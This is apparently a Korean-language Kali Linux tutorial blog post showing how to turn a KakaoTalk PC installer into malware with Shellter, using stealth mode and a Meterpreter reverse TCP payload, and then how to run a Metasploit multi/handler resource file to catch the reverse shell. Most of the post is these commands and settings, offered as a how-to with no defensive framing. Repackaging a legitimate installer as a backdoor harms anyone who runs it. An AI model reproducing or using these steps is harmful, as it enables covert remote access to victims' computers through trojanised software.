Custom Payload
feat. shellter
shellter 설치 및 사용
shellter 설치 명령어
root@kali:~# apt-get install shellter |
shellter 실행 명령어
root@kali:~# shellter |
shellter 실행 화면 에서 Mode는 Auto 로 선택한 후 미리 받아놓은 카카오톡 PC 버전 설치파일 경로를 입력한다.
설치 중간에 나오는 옵션은 아래와 같이 설정한다.
Payload index 1은 Meterpreter_Reverse_TCP 이다.
E m a b l e S t e a l t h M o d e ? ( Y / N / H ) : y U s e a l i s t e d p a y l o a d o r c u s t o m ? ( L / C / H ) : l S e l e c t p a y l o a d b y i n d e x : 1 S E T L H O S T : x x x . x x x . x x x . x x x S E T L P O R T : 5 0 0 0 |
위 과정을 통해 카카오 PC 버전 설치파일이 악성코드로 변환 된다.
database 서비스 시작 명령어
root@kali:~/Desktop# service postgresql start |
Metasploit 리소스 파일을 아래와 같이 작성한다.
[localhandler.rc] use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost xxx.xxx.xxx.xxx set lport 5000 set exitonsession false set autorunscript post/windows/manage/priv_migrate exploit -j |
위에서 작성한 리소스 파일을 가지고 Metasploit 실행
root@kali:~/Desktop# msfconsole -r localhandler.rc |
악성코드로 변환된 카카오톡 설치파일은 철저한 보안으로 인해 실행되지는 않는다.
하지만 리소스 파일의 set autorunscript 명령으로 Metasploit의 연결을 유지해준다.
nmap 사용법 (0) | 2018.04.11 |
---|---|
TCP idle Scan (0) | 2018.04.10 |
Veil-evasion 설치 및 사용 (0) | 2018.04.10 |
kali linux(feat.python) IP SCAN (0) | 2018.04.05 |
kali Linux 명령어 및 기초 (0) | 2018.04.04 |